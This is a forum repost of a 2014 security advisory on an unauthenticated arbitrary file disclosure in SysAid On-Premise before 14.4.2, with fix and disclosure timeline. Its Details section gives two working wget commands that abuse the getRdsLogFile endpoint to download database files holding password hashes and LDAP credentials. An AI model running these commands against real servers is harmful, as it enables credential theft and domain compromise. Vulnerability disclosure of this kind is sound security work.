Aerosol Posted December 26, 2014 Report Posted December 26, 2014 Vantage Point Security Advisory 2014-004========================================Title: SysAid Server Arbitrary File DisclosureID: VP-2014-004Vendor: SysAidAffected Product: SysAid On-PremiseAffected Versions: < 14.4.2Product Website: http://www.sysaid.com/product/sysaidAuthor: Bernhard Mueller <bernhard[at]vantagepoint[dot]sg>Summary:---SysAid Server is vulnerable to an unauthenticated file disclosureattack that allows an anonymous attacker to read arbitrary files onthe system. An attacker exploiting this issue can compromise SysAiduser accounts and gain access to important system files. When SysAidis configured to use LDAP authentication it is possible to gain readaccess to the entire Active Directory or obtain domain adminprivileges.Details:---How to download SysAid server database files containing usernames andpassword hashes (use any unauthenticated session ID):wget -O "ilient.mdf" --header="Cookie:JSESSIONID=1C712103AA8E9A3D3F1D834E0063A089" \"http://sysaid.example.com/getRdsLogFile?fileName=c:\\\\Program+Files\\\\SysAidMsSQL\\\\MSSQL10_50.SYSAIDMSSQL\\\\MSSQL\\DATA\\\\ilient.mdf"wget -O "ilient.ldf" --header="Cookie:JSESSIONID=1C712103AA8E9A3D3F1D834E0063A089" \"http://sysaid.example.com/getRdsLogFile?fileName=c:\\\\Program+Files\\\\SysAidMsSQL\\\\MSSQL10_50.SYSAIDMSSQL\\\\MSSQL\\DATA\\\\ilient_log.LDF"The dowloaded MSSQL files contain the LDAP user account and encryptedpassword used to access the Active Directory (SysAid encrypts thepassword with a static key that is the same for all instances of thesoftware).Fix Information:---Upgrade to version 14.4.2.Timeline:---2014/11/14: Issue reported2014/12/22: Patch available and installed by clientAbout Vantage Point Security:---Vantage Point Security is the leading provider for penetration testingand security advisory services in Singapore. Clients in the Financial,Banking and Telecommunications industries select Vantage PointSecurity based on technical competency and a proven track record todeliver significant and measurable improvements in their securityposture.Web: https://www.vantagepoint.sg/Contact: office[at]vantagepoint[dot]sgSource Quote